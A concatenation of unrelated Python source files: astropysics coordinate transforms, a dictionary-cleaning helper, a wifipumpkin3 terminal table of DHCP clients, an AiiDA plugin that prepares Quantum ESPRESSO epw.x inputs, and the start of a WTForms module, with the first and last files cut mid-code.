        lamb = degrees(atan2(y,x))
        return EclipticCoordinatesCIRS(lamb,beta,distanceau=r,epoch=rec.epoch)
    @CoordinateSystem.registerTransform('self',EclipticCoordinatesEquinox)
    def _toEcQ(rec):
        #cartesian -> spherical (lambda, beta, r)
        from math import asin,atan2,degrees
        x,y,z = rec.x,rec.y,rec.z
        r = (x*x+y*y+z*z)**0.5
        beta = degrees(asin(z/r))
        lamb = degrees(atan2(y,x))
        return EclipticCoordinatesEquinox(lamb,beta,distanceau=r,epoch=rec.epoch)
    @CoordinateSystem.registerTransform(EclipticCoordinatesCIRS,'self')
    def _fromEcC(ec):
        #spherical -> cartesian; unit distance if none is given
        from math import sin,cos
        l,b = ec.lamb.r,ec.beta.r
        if ec.distanceau is None:
            r = 1
        else:
            #distanceau appears to be a sequence whose first element is the
            #distance in AU - TODO confirm against the distanceau property
            r = ec.distanceau[0]
        x = r*cos(l)*cos(b)
        y = r*sin(l)*cos(b)
        z = r*sin(b)
        return RectangularGeocentricEclipticCoordinates(x,y,z,ec.epoch)
    @CoordinateSystem.registerTransform(EclipticCoordinatesEquinox,'self')
    def _fromEcQ(ec):
        #spherical -> cartesian; unit distance if none is given
        from math import sin,cos
        l,b = ec.lamb.r,ec.beta.r
        if ec.distanceau is None:
            r = 1
        else:
            r = ec.distanceau[0]
        x = r*cos(l)*cos(b)
        y = r*sin(l)*cos(b)
        z = r*sin(b)
        return RectangularGeocentricEclipticCoordinates(x,y,z,ec.epoch)
class GalacticCoordinates(EpochalLatLongCoordinates):
    """
    Galactic longitude and latitude (l,b), defined relative to the J2000 (FK5)
    and B1950 (FK4) north galactic pole positions given below.
    """
    __slots__ = tuple()
    _longlatnames_ = ('l','b')
    _longrange_ = (0,360)
    #north galactic pole and the galactic longitude zero point, in both the
    #J2000/FK5 and B1950/FK4 systems
    _ngp_J2000 = FK5Coordinates(192.859508, 27.128336,epoch=2000)
    _long0_J2000 = AngularCoordinate(122.932)
    _ngp_B1950 = FK4Coordinates(192.25, 27.4,epoch=1950)
    _long0_B1950 = AngularCoordinate(123)
    def transformToEpoch(self,newepoch):
        """
        Galactic coordinates are nominally inertial, although the definition is
        a bit unclear in that regard.
        """
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @CoordinateSystem.registerTransform(FK5Coordinates,'self',transtype='smatrix')
    def _fromFK5(fk5coords):
        from ..utils import rotation_matrix
        epoch = 2000 if fk5coords.epoch is None else fk5coords.epoch
        #precess to J2000, rotate the pole's RA onto z, tilt down to the
        #pole's dec, then spin so galactic longitude 0 lands correctly
        mat = rotation_matrix(180 - GalacticCoordinates._long0_J2000.d,'z') *\
              rotation_matrix(90 - GalacticCoordinates._ngp_J2000.dec.d,'y') *\
              rotation_matrix(GalacticCoordinates._ngp_J2000.ra.d,'z') *\
              FK5Coordinates._precessionMatrixJ(epoch,2000)
        mat.nocache = True #can't cache because of the need to get the epoch
        return mat
    @CoordinateSystem.registerTransform('self',FK5Coordinates,transtype='smatrix')
    def _toFK5(galcoords):
        #transpose == inverse for the rotation matrix
        return GalacticCoordinates._fromFK5(galcoords).T
    @CoordinateSystem.registerTransform(FK4Coordinates,'self',transtype='smatrix')
    def _fromFK4(fk4coords):
        from ..utils import rotation_matrix
        epoch = 1950 if fk4coords.epoch is None else fk4coords.epoch
        #same construction as _fromFK5, using the B1950 pole and Newcomb
        #precession instead
        mat = rotation_matrix(180 - GalacticCoordinates._long0_B1950.d,'z') *\
              rotation_matrix(90 - GalacticCoordinates._ngp_B1950.dec.d,'y') *\
              rotation_matrix(GalacticCoordinates._ngp_B1950.ra.d,'z') *\
              FK4Coordinates._precessionMatrixB(epoch,1950)
        mat.nocache = True #can't cache because of the need to get the epoch
        return mat
    @CoordinateSystem.registerTransform('self',FK4Coordinates,transtype='smatrix')
    def _toFK4(galcoords):
        #transpose == inverse for the rotation matrix
        return GalacticCoordinates._fromFK4(galcoords).T
class SupergalacticCoordinates(EpochalLatLongCoordinates):
    """
    Supergalactic longitude and latitude (sgl,sgb), defined by the north
    supergalactic pole and longitude zero-point given below in galactic
    coordinates.
    """
    __slots__ = tuple()
    _longlatnames_ = ('sgl','sgb')
    _longrange_ = (0,360)
    #north supergalactic pole in galactic coords (glactc's 47.47 is WRONG)
    _nsgp_gal = GalacticCoordinates(47.37,6.32)
    #supergalactic longitude zero-point in galactic coords
    _sg0_gal = GalacticCoordinates(137.37,0)
    def transformToEpoch(self,newepoch):
        """
        Supergalactic coordinates are nominally inertial, although the
        definition is a bit unclear in that regard.
        """
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    @CoordinateSystem.registerTransform('self',GalacticCoordinates,transtype='smatrix')
    def _toGal(sgalcoords):
        #inverse of the galactic->supergalactic rotation; the matrix is a
        #real unitary rotation, so the transpose is the inverse
        return SupergalacticCoordinates._fromGal(sgalcoords).T
    @CoordinateSystem.registerTransform(GalacticCoordinates,'self',transtype='smatrix')
    def _fromGal(galcoords):
        from ..utils import rotation_matrix
        npole = SupergalacticCoordinates._nsgp_gal
        origin = SupergalacticCoordinates._sg0_gal
        #spin the pole's longitude onto the x-z plane, tilt down to the
        #pole's latitude, then rotate the supergalactic origin to zero
        spinpole = rotation_matrix(npole.l.d,'z')
        tilt = rotation_matrix(90 - npole.b.d,'y')
        spinorigin = rotation_matrix(180 - origin.l.d + npole.l.d,'z')
        return spinorigin*tilt*spinpole
class HorizontalCoordinates(LatLongCoordinates):
    """
    This object represents an angular location on the unit sphere, with the
    north pole of the coordinate position fixed to the local zenith
    To convert from other :class:`Coordinate` types to horizontal positions, see
    :class:`astropysics.obstools.Site`, as site information is required for
    these corrections
    """
    __slots__ = tuple()
    _longlatnames_ = ('az','alt')
    _longrange_ = (0,360)
    def __init__(self,alt=0,az=0,alterr=None,azerr=None,distancepc=None):
        """
        See the associated attribute docstrings for the meaning of the inputs.
        """
        #note the argument swap: the base class takes (long,lat,...), so the
        #azimuth is passed first even though alt is this initializer's first arg
        LatLongCoordinates.__init__(self,az,alt,azerr,alterr,distancepc)
    @CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self')
    @CoordinateSystem.registerTransform(CIRSCoordinates,'self')
    def _toHoriz(incoosys=None):
        #deliberately unsupported: site information is required (see class doc)
        raise TypeError('use astropysics.obstools.Site methods to transform celestial to terrestrial coordinates')
    @CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox)
    @CoordinateSystem.registerTransform('self',CIRSCoordinates)
    def _fromHoriz(incoosys=None):
        #deliberately unsupported: site information is required (see class doc)
        raise TypeError('use astropysics.obstools.Site methods to transform terrestrial to celestial coordinates')
#Now that all the coordinate systems have been made, add the diagram to the docs
#That shows the graph of the built-in transforms
#(postbuiltin is appended to the module docstring in both branches below)
postbuiltin = """
A similar diagram can be generated after the user has created and registered
custom coordinates and transforms::
from networkx import to_agraph,relabel_nodes,draw_networkx
from astropysics.coords import CoordinateSystem
graph = CoordinateSystem.getTransformGraph()
dotgraph = to_agraph(relabel_nodes(graph,lambda n:n.__name__))
dotgraph.graph_attr.update(dict(size='12.0, 12.0',fontsize=12))
dotgraph.write('mygraph.dot')
draw_networkx(graph)
This will save a graphviz dot file and displaying the graph with matplotlib,
showing both builtin and custom-added coordinates and transforms.
"""
try:
    #render the transform graph to graphviz source and splice it into the
    #module docstring at the {transformdiagram} placeholder
    from networkx import to_agraph,relabel_nodes
    graph = to_agraph(relabel_nodes(CoordinateSystem.getTransformGraph(),lambda n:n.__name__))
    graph.graph_attr.update(dict(size=r'12.0, 12.0',fontsize=12))
    transstr="""
Built-in Transforms
^^^^^^^^^^^^^^^^^^^
A number of coordinate systems are provided built into astropysics. Most of
these have pre-defined standard transformations. The built-in coordinate classes
with defined transformation are shown in the diagram below.
.. graphviz::
"""+graph.string().replace('\n','\n ')+postbuiltin
    __doc__ = __doc__.replace('{transformdiagram}',transstr)
    #clean the temporary names out of the module namespace
    del to_agraph,relabel_nodes,graph
except ImportError:
    #if networkx or pygraphviz isn't present, drop the diagram but add a warning that it's missing
    warningstr = """
Builtin Coordinate System Transforms
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. warning::
A diagram showing the relationships between the pre-defined transformations
should be here, but this copy of the documentation was built without
`networkx <http://networkx.lanl.gov/>` and `pygraphviz
<http://networkx.lanl.gov/pygraphviz/>` available to build the diagram.
Please re-build this file after those packages are installed to see the
diagram.
"""+postbuiltin
    __doc__ = __doc__.replace('{transformdiagram}',warningstr)
    del warningstr
#<--------------------------Convinience Functions------------------------------>
def angular_string_to_dec(instr,hms=True,degrees=True):
    """
    Convenience function converting an angular coordinate string to a decimal
    value.
    :param hms:
        If True, the coordinate will be assumed to be h:m:s, otherwise d:m:s.
        This will be ignored if the coordinates are specified as ##h##m##s or
        ##d##m##s, or if the input is not in sexigesimal form.
    :type hms: boolean
    :param degrees:
        If True, the output will be decimal degrees, otherwise radians.
    :type degrees: boolean
    :returns: Decimal value in radians or degrees
    """
    #NOTE(review): `hms` is documented but never forwarded to
    #AngularCoordinate - confirm whether the parser needs it
    parsed = AngularCoordinate(instr)
    return parsed.degrees if degrees else parsed.radians
def objects_to_coordinate_arrays(posobjs,coords='auto',degrees=True):
    """
    converts a sequence of position objects into an array of coordinates.
    `coords` determines the order of the output coordinates - it can be a
    comma-separated list of coordinate names or if 'auto', it will be 'lat,long'
    for all coordinate systems except for Equatorial, which will use 'ra,dec'
    if `degrees` is True, returned arrays are in degrees, otherwise radians

    :returns:
        a (ncoords,N) :class:`numpy.ndarray` where ncoords is 2 for 'auto'
        or the number of names given in `coords`
    """
    if coords=='auto':
        coordnames = None
    else:
        coordnames = coords.split(',')
    #each coordinate exposes its value as .d (degrees) and .r (radians);
    #select the attribute once instead of duplicating the loop per unit
    attr = 'd' if degrees else 'r'
    coordlist = []
    for o in posobjs:
        if coordnames is None:
            if isinstance(o,EquatorialCoordinates):
                coordlist.append((getattr(o.ra,attr),getattr(o.dec,attr)))
            else:
                coordlist.append((getattr(o.lat,attr),getattr(o.long,attr)))
        else:
            coordlist.append([getattr(getattr(o,c),attr) for c in coordnames])
    return np.array(coordlist).T
|
def clean_dict(data):
    """
    Delete keys with the value ``None`` in a dictionary, recursively.

    Nested dictionaries are cleaned in place, and dictionaries found inside
    lists (at any nesting depth) are cleaned as well.  This alters the input
    so you may wish to ``copy`` the dict first.

    :param data: the dictionary to clean (modified in place).
    :returns: the same dictionary, for chaining convenience.
    """
    # list() snapshot so keys can be deleted while iterating
    for key, value in list(data.items()):
        if value is None:
            del data[key]
        elif isinstance(value, dict):
            clean_dict(value)
        elif isinstance(value, list):
            # BUGFIX: the original called clean_dict() directly on nested
            # lists, which raised AttributeError (lists have no .items())
            data[key] = _clean_list(value)
    return data


def _clean_list(items):
    """Return a new list with all nested dicts cleaned and nested lists recursed."""
    cleaned = []
    for v in items:
        if isinstance(v, dict):
            cleaned.append(clean_dict(v))
        elif isinstance(v, list):
            cleaned.append(_clean_list(v))
        else:
            cleaned.append(v)
    return cleaned
|
import urwid, time, threading
from tabulate import tabulate
from netaddr import EUI
from wifipumpkin3.core.utility.collection import SettingsINI
import wifipumpkin3.core.utility.constants as C
import fcntl, termios, struct, os
from wifipumpkin3.core.common.platforms import hexdump
from multiprocessing import Process
from wifipumpkin3.core.config.globalimport import *
from wifipumpkin3.core.ui.uimode import WidgetBase
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#urwid display-attribute palette: (name, foreground, background) triples used
#by the ui_TableMonitorClient main loop.
#NOTE(review): "getting quote" is listed twice with different backgrounds
#("black" then "") - the later registration takes effect; confirm intended.
palette_color = [
    ("titlebar", "", ""),
    ("refresh button", "dark green,bold", "black"),
    ("quit button", "dark red,bold", "black"),
    ("getting quote", "dark blue", "black"),
    ("getting quote", "dark blue", ""),
    ("headers", "black,bold", "black"),
    ("change", "dark green", ""),
    ("change negative", "dark red", ""),
    ("body", "white", "black"),
    ("title", "black", "dark blue"),
]
class ui_TableMonitorClient(WidgetBase):
    """Fullscreen urwid table that monitors DHCP client connections.

    Reads the connected-clients JSON file (``C.CLIENTS_CONNECTED``) and
    redraws the whole widget tree once per second via an urwid alarm.
    """

    # Identifiers used by the plugin/config framework.
    ConfigRoot = "ui_table_mod"
    SubConfig = "ui_table_mod"
    ID = "ui_table_mod"
    Name = "ui_table_mod"

    def __init__(self, parent):
        self.parent = parent
        self.table_clients = []  # rows of [hostname, ip, mac, vendor]
        self.__threadServices = []
        # NOTE(review): __threadStatus is set here but never read anywhere
        # in this class — looks like dead state; confirm before removing.
        self.__threadStatus = False
        # Title-bar markup: mix of (attr, text) tuples and plain strings.
        self.header_text = [
            ("titlebar", ""),
            "Clients: ",
            ("title", "UP"),
            ",",
            ("title", "DOWN"),
            ":scroll",
            " Monitor DHCP Requests",
        ]

    def getClientsCount(self):
        """Return the number of client rows currently held."""
        return len(self.table_clients)

    def setup_view(self):
        """(Re)build the whole urwid widget tree and load current clients."""
        self.header_wid = urwid.AttrWrap(urwid.Text(self.header_text), "title")
        self.menu = urwid.Text([u"Press (", ("quit button", u"Q"), u") to quit."])
        self.lwDevices = urwid.SimpleListWalker([])
        self.body = urwid.ListBox(self.lwDevices)
        self.main_box = urwid.LineBox(self.body)
        self.layout = urwid.Frame(
            header=self.header_wid, body=self.main_box, footer=self.menu
        )
        # Populate the table from the on-disk JSON of connected clients.
        self.add_Clients(Refactor.readFileDataToJson(C.CLIENTS_CONNECTED))

    def render_view(self):
        """Return the root widget handed to the main loop."""
        return self.layout

    def main(self):
        """Build the UI and enter the blocking urwid main loop."""
        self.setup_view()
        loop = urwid.MainLoop(
            self.render_view(), palette=palette_color, unhandled_input=self.handleWindow
        )
        # First refresh fires after one second; refresh() then reschedules itself.
        loop.set_alarm_in(1, self.refresh)
        loop.run()

    def refresh(self, loop=None, data=None):
        """Alarm callback: rebuild the view and reschedule in one second."""
        self.setup_view()
        loop.widget = self.render_view()
        loop.set_alarm_in(1, self.refresh)

    def start(self):
        """Entry point: runs the blocking UI loop."""
        self.main()

    def stop(self):
        # NOTE(review): relies on self.lwDevices, which only exists after
        # setup_view() has run — confirm stop() is never called earlier.
        if len(self.__threadServices) > 0:
            self.table_clients = []
            self.lwDevices.append(urwid.Text(("", self.up_Clients())))

    def get_mac_vendor(self, mac):
        """Resolve the OUI registrant (vendor) for *mac*.

        Returns "unknown vendor" on any failure (bare except kept as-is:
        netaddr raises on unregistered/malformed addresses).
        """
        try:
            d_vendor = EUI(mac)
            d_vendor = d_vendor.oui.registration().org
        except:
            d_vendor = "unknown vendor"
        return d_vendor

    def add_Clients(self, data_dict):
        """Rebuild the table rows from *data_dict* and refresh the list box.

        *data_dict* maps client keys to dicts carrying at least the
        ``HOSTNAME``, ``IP`` and ``MAC`` keys.
        """
        self.table_clients = []
        for data in data_dict:
            self.table_clients.append(
                [
                    data_dict[data]["HOSTNAME"],
                    data_dict[data]["IP"],
                    data_dict[data]["MAC"],
                    self.get_mac_vendor(data_dict[data]["MAC"]),
                ]
            )
        self.lwDevices.clear()
        self.lwDevices.append(urwid.Text(("", self.up_Clients())))
        # NOTE(review): ``self._body`` is never assigned in this class —
        # setup_view() assigns ``self.body``. Presumably provided by
        # WidgetBase; confirm, otherwise this raises AttributeError.
        self._body.set_focus(len(self.lwDevices) - 1, "above")

    def up_Clients(self):
        """Return the table rendered via tabulate, or '' when empty."""
        if len(self.table_clients) > 0:
            return tabulate(self.table_clients, ("Hostname", "IP", "Mac", "Vendor"))
        return ""

    def handleWindow(self, key):
        """Global key handler: Q/q/esc quits; R/r is reserved (no-op)."""
        if key == "R" or key == "r":
            pass
        elif key == "Q" or key == "q" or key == "esc":
            raise urwid.ExitMainLoop()
|
# -*- coding: utf-8 -*-
"""Plugin to create a Quantum Espresso epw.x input file."""
import os
import numpy as np
from aiida import orm
from aiida.common import datastructures, exceptions
from aiida_quantumespresso.calculations import _lowercase_dict, _uppercase_dict
from aiida_quantumespresso.utils.convert import convert_input_to_namelist_entry
from .base import CalcJob
class EpwCalculation(CalcJob):
    """`CalcJob` implementation for the epw.x code of Quantum ESPRESSO."""

    # Keywords that cannot be set by the user but will be set by the plugin
    _blocked_keywords = [('INPUTEPW', 'outdir'), ('INPUTEPW', 'iverbosity'), ('INPUTEPW', 'prefix'),
                         ('INPUTEPW', 'dvscf_dir'), ('INPUTEPW', 'amass'), ('INPUTEPW', 'nq1'), ('INPUTEPW', 'nq2'),
                         ('INPUTEPW', 'nq3'), ('INPUTEPW', 'nk1'), ('INPUTEPW', 'nk2'), ('INPUTEPW', 'nk3')]

    _use_kpoints = True

    # Namelists that are always written to the input file, in this order.
    _compulsory_namelists = ['INPUTEPW']

    # Default input and output files
    _PREFIX = 'aiida'
    _DEFAULT_INPUT_FILE = 'aiida.in'
    _DEFAULT_OUTPUT_FILE = 'aiida.out'
    _OUTPUT_XML_TENSOR_FILE_NAME = 'tensors.xml'
    _OUTPUT_SUBFOLDER = './out/'
    _SAVE_PREFIX = '/save/'
    _FOLDER_SAVE = 'save'
    _FOLDER_DYNAMICAL_MATRIX = 'DYN_MAT'

    # Not using symlink in pw to allow multiple nscf to run on top of the same scf
    _default_symlink_usage = False

    @classmethod
    def define(cls, spec):
        """Define the process specification."""
        # yapf: disable
        super().define(spec)
        spec.input('metadata.options.input_filename', valid_type=str, default=cls._DEFAULT_INPUT_FILE)
        spec.input('metadata.options.output_filename', valid_type=str, default=cls._DEFAULT_OUTPUT_FILE)
        spec.input('metadata.options.withmpi', valid_type=bool, default=True)
        # Coarse (kpoints/qpoints) and fine (kfpoints/qfpoints) meshes; only
        # their mesh sizes are used — offsets must be zero (see test_offset).
        spec.input('kpoints', valid_type=orm.KpointsData, help='coarse kpoint mesh')
        spec.input('qpoints', valid_type=orm.KpointsData, help='coarse qpoint mesh')
        spec.input('kfpoints', valid_type=orm.KpointsData, help='fine kpoint mesh')
        spec.input('qfpoints', valid_type=orm.KpointsData, help='fine qpoint mesh')
        spec.input('parameters', valid_type=orm.Dict, help='')
        spec.input('settings', valid_type=orm.Dict, required=False, help='')
        spec.input('parent_folder_nscf', valid_type=orm.RemoteData,
                   help='the folder of a completed nscf `PwCalculation`')
        spec.input('parent_folder_ph', valid_type=orm.RemoteData, help='the folder of a completed `PhCalculation`')

    def prepare_for_submission(self, folder):  # pylint: disable=too-many-statements,too-many-branches
        """Prepare the calculation job for submission by transforming input nodes into input files.

        In addition to the input files being written to the sandbox folder, a `CalcInfo` instance will be returned that
        contains lists of files that need to be copied to the remote machine before job submission, as well as file
        lists that are to be retrieved after job completion.

        :param folder: a sandbox folder to temporarily write files on disk.
        :return: :py:class:`~aiida.common.datastructures.CalcInfo` instance.
        """

        def test_offset(offset):
            """Check if the grid has an offset."""
            if any([i != 0. for i in offset]):
                raise NotImplementedError(
                    'Computation of electron-phonon on a mesh with non zero offset is not implemented, '
                    'at the level of epw.x')

        # pylint: disable=too-many-statements,too-many-branches

        local_copy_list = []
        remote_copy_list = []
        remote_symlink_list = []

        if 'settings' in self.inputs:
            settings = _uppercase_dict(self.inputs.settings.get_dict(), dict_name='settings')
        else:
            settings = {}

        # Copy nscf folder
        parent_folder_nscf = self.inputs.parent_folder_nscf
        parent_calc_nscf = parent_folder_nscf.creator

        if parent_calc_nscf is None:
            raise exceptions.NotExistent(f'parent_folder<{parent_folder_nscf.pk}> has no parent calculation')

        # Also, the parent calculation must be on the same computer
        if not self.node.computer.uuid == parent_calc_nscf.computer.uuid:
            raise exceptions.InputValidationError(
                'Calculation has to be launched on the same computer as that of the parent: {}'.format(
                    parent_calc_nscf.computer.get_name()))

        # put by default, default_parent_output_folder = ./out
        parent_calc_out_subfolder_nscf = parent_calc_nscf.process_class._OUTPUT_SUBFOLDER  # pylint: disable=protected-access

        # Now phonon folder
        parent_folder_ph = self.inputs.parent_folder_ph
        parent_calc_ph = parent_folder_ph.creator
        # NOTE(review): unlike the nscf parent, parent_calc_ph is not checked
        # for None before use — confirm a creator-less RemoteData is impossible here.

        # Also, the parent calculation must be on the same computer
        if not self.node.computer.uuid == parent_calc_ph.computer.uuid:
            raise exceptions.InputValidationError(
                'Calculation has to be launched on the same computer as that of the parent: {}'.format(
                    parent_calc_ph.computer.get_name()))

        # I put the first-level keys as uppercase (i.e., namelist and card names) and the second-level keys as lowercase
        parameters = _uppercase_dict(self.inputs.parameters.get_dict(), dict_name='parameters')
        parameters = {k: _lowercase_dict(v, dict_name=k) for k, v in parameters.items()}

        if 'INPUTEPW' not in parameters:
            raise exceptions.InputValidationError('required namelist INPUTEPW not specified')

        # Force the plugin-controlled keywords (see _blocked_keywords).
        parameters['INPUTEPW']['outdir'] = self._OUTPUT_SUBFOLDER
        parameters['INPUTEPW']['iverbosity'] = 1
        parameters['INPUTEPW']['prefix'] = self._PREFIX

        # Each mesh below must be an offset-free regular grid; its sizes are
        # injected into INPUTEPW. `postpend_text` is (re)initialised to None
        # after each successful mesh read.
        try:
            mesh, offset = self.inputs.qpoints.get_kpoints_mesh()
            test_offset(offset)
            parameters['INPUTEPW']['nq1'] = mesh[0]
            parameters['INPUTEPW']['nq2'] = mesh[1]
            parameters['INPUTEPW']['nq3'] = mesh[2]
            postpend_text = None
        except NotImplementedError as exception:
            raise exceptions.InputValidationError('Cannot get the coarse q-point grid') from exception

        try:
            mesh, offset = self.inputs.kpoints.get_kpoints_mesh()
            test_offset(offset)
            parameters['INPUTEPW']['nk1'] = mesh[0]
            parameters['INPUTEPW']['nk2'] = mesh[1]
            parameters['INPUTEPW']['nk3'] = mesh[2]
            postpend_text = None
        except NotImplementedError as exception:
            raise exceptions.InputValidationError('Cannot get the coarse k-point grid') from exception

        try:
            mesh, offset = self.inputs.qfpoints.get_kpoints_mesh()
            test_offset(offset)
            parameters['INPUTEPW']['nqf1'] = mesh[0]
            parameters['INPUTEPW']['nqf2'] = mesh[1]
            parameters['INPUTEPW']['nqf3'] = mesh[2]
            postpend_text = None
        except NotImplementedError as exception:
            raise exceptions.InputValidationError('Cannot get the fine q-point grid') from exception

        try:
            mesh, offset = self.inputs.kfpoints.get_kpoints_mesh()
            test_offset(offset)
            parameters['INPUTEPW']['nkf1'] = mesh[0]
            parameters['INPUTEPW']['nkf2'] = mesh[1]
            parameters['INPUTEPW']['nkf3'] = mesh[2]
            postpend_text = None
        except NotImplementedError as exception:
            raise exceptions.InputValidationError('Cannot get the fine k-point grid') from exception

        # customized namelists, otherwise not present in the distributed epw code
        try:
            namelists_toprint = settings.pop('NAMELISTS')
            if not isinstance(namelists_toprint, list):
                raise exceptions.InputValidationError(
                    "The 'NAMELISTS' value, if specified in the settings input "
                    'node, must be a list of strings')
        except KeyError:  # list of namelists not specified in the settings; do automatic detection
            namelists_toprint = self._compulsory_namelists

        # create the save folder with dvscf and dyn files.
        folder.get_subfolder(self._FOLDER_SAVE, create=True)

        # List of IBZ q-point to be added below EPW. To be removed when removed from EPW.
        qibz_ar = []
        for key, value in sorted(parent_folder_ph.creator.outputs.output_parameters.get_dict().items()):
            if key.startswith('dynamical_matrix_'):
                qibz_ar.append(value['q_point'])

        qibz_node = orm.ArrayData()
        qibz_node.set_array('qibz', np.array(qibz_ar))

        list_of_points = qibz_node.get_array('qibz')
        # Number of q-point in the irreducible Brillouin Zone.
        # NOTE(review): this is len(list_of_points[0, :]) — the number of
        # *coordinate components* of the first point (normally 3), not the
        # number of points (len(list_of_points)); confirm this is intended,
        # since it bounds the dyn/dvscf copy loop below.
        nqpt = len(list_of_points[0, :])

        # add here the list of point coordinates
        if len(list_of_points) > 1:
            postpend_text = f'{len(list_of_points)} cartesian\n'
            for points in list_of_points:
                postpend_text += '{0:18.10f} {1:18.10f} {2:18.10f} \n'.format(*points)

        # Write the namelists (INPUTEPW plus any custom ones), then the
        # optional explicit q-point list.
        with folder.open(self.metadata.options.input_filename, 'w') as infile:
            for namelist_name in namelists_toprint:
                infile.write(f'&{namelist_name}\n')
                # namelist content; set to {} if not present, so that we leave an empty namelist
                namelist = parameters.pop(namelist_name, {})
                for key, value in sorted(namelist.items()):
                    infile.write(convert_input_to_namelist_entry(key, value))
                infile.write('/\n')

            # add list of qpoints if required
            if postpend_text is not None:
                infile.write(postpend_text)

        # Any namelist left over in `parameters` was not consumed above and
        # is therefore invalid for this calculation type.
        if parameters:
            raise exceptions.InputValidationError(
                'The following namelists are specified in parameters, but are '
                'not valid namelists for the current type of calculation: '
                '{}'.format(','.join(list(parameters.keys()))))

        # copy the parent scratch
        symlink = settings.pop('PARENT_FOLDER_SYMLINK', self._default_symlink_usage)  # a boolean
        if symlink:
            # I create a symlink to each file/folder in the parent ./out
            folder.get_subfolder(self._OUTPUT_SUBFOLDER, create=True)

            remote_symlink_list.append((
                parent_folder_nscf.computer.uuid,
                os.path.join(parent_folder_nscf.get_remote_path(), parent_calc_out_subfolder_nscf, '*'),
                self._OUTPUT_SUBFOLDER
            ))
        else:
            # here I copy the whole folder ./out
            remote_copy_list.append((
                parent_folder_nscf.computer.uuid,
                os.path.join(parent_folder_nscf.get_remote_path(), parent_calc_out_subfolder_nscf),
                self._OUTPUT_SUBFOLDER
            ))

        prefix = self._PREFIX

        # For each q-point: copy the dynamical matrix and the dvscf/phsave
        # files from the ph.x parent into ./save under epw.x's expected names.
        for iqpt in range(1, nqpt+1):
            label = str(iqpt)
            # NOTE(review): this q0 copy has a constant source and destination,
            # so it re-queues the same transfer on every loop iteration —
            # it could be hoisted out of the loop.
            tmp_path = os.path.join(self._FOLDER_DYNAMICAL_MATRIX, 'dynamical-matrix-0')
            remote_copy_list.append((
                parent_folder_ph.computer.uuid,
                os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
                'save/'+prefix+'.dyn_q0'))
            tmp_path = os.path.join(self._FOLDER_DYNAMICAL_MATRIX, 'dynamical-matrix-'+label)
            remote_copy_list.append((
                parent_folder_ph.computer.uuid,
                os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
                'save/'+prefix+'.dyn_q'+label))

            if iqpt == 1:
                # q=1 also carries the dvscf of _ph0 and the whole .phsave dir.
                # NOTE(review): the '.dvscf*' glob source is copied onto a single
                # file name — presumably exactly one file matches; confirm.
                tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.dvscf*')
                remote_copy_list.append((
                    parent_folder_ph.computer.uuid,
                    os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
                    'save/'+prefix+'.dvscf_q'+label))
                tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.phsave')
                remote_copy_list.append((
                    parent_folder_ph.computer.uuid,
                    os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
                    'save/'))
            else:
                tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.q_'+label+'/'+prefix+'.dvscf*')
                remote_copy_list.append((
                    parent_folder_ph.computer.uuid,
                    os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
                    'save/'+prefix+'.dvscf_q'+label))

        codeinfo = datastructures.CodeInfo()
        codeinfo.cmdline_params = (list(settings.pop('CMDLINE', [])) + ['-in', self.metadata.options.input_filename])
        codeinfo.stdout_name = self.metadata.options.output_filename
        codeinfo.code_uuid = self.inputs.code.uuid

        calcinfo = datastructures.CalcInfo()
        calcinfo.codes_info = [codeinfo]
        calcinfo.local_copy_list = local_copy_list
        calcinfo.remote_copy_list = remote_copy_list
        calcinfo.remote_symlink_list = remote_symlink_list

        # Retrieve by default the output file
        calcinfo.retrieve_list = []
        calcinfo.retrieve_list.append(self.metadata.options.output_filename)
        calcinfo.retrieve_list += settings.pop('ADDITIONAL_RETRIEVE_LIST', [])

        # Any settings key not consumed above is a user error.
        if settings:
            unknown_keys = ', '.join(list(settings.keys()))
            raise exceptions.InputValidationError(f'`settings` contained unexpected keys: {unknown_keys}')

        return calcinfo
|
# encoding: utf8
from collections import OrderedDict
from wtforms_alchemy import (ModelForm, QuerySelectField,
DataRequired)
from wtforms import TextField
from wtforms.validators import EqualTo, Required
from wtforms.fields import FormField, PasswordField, HiddenField
from wtforms.widgets import Input, HTMLString
from trombi import mappings
from trombi.db import Session
from trombi.mappings import City
def get_codes():
    """Return a query over all ``Category`` rows (query factory for
    ``QuerySelectField``)."""
    # Fix: dropped the redundant function-local `from trombi.db import
    # Session` — Session is already imported at module level.
    session = Session()
    return session.query(mappings.Category)
def get_city():
    """Return the ``City`` rows that at least one member lives in
    (query factory for city selection)."""
    # Fix: dropped the redundant function-local `from trombi.db import
    # Session` — Session is already imported at module level.
    session = Session()
    # Distinct city ids actually referenced by members, as a subquery.
    sq = session.query(mappings.Member.city_id).distinct().subquery()
    return session.query(mappings.City).filter(mappings.City.id.in_(sq))
def get_city_label(city):
    """Build the display label for *city*: "<label> (<zipcode>)"."""
    label = city.label
    zipcode = city.zipcode
    return '%s (%s)' % (label, zipcode)
def get_membership():
    """Return a query over all ``Membership`` rows (query factory for
    ``QuerySelectField``)."""
    # Fix: dropped the redundant function-local `from trombi.db import
    # Session` — Session is already imported at module level.
    session = Session()
    return session.query(mappings.Membership)
class BaseForm(ModelForm):
    """Common base for the trombi forms.

    Subclasses may define a ``field_order`` tuple to control iteration
    order; the special name ``'*'`` expands to every field not explicitly
    listed, in declaration order.
    """

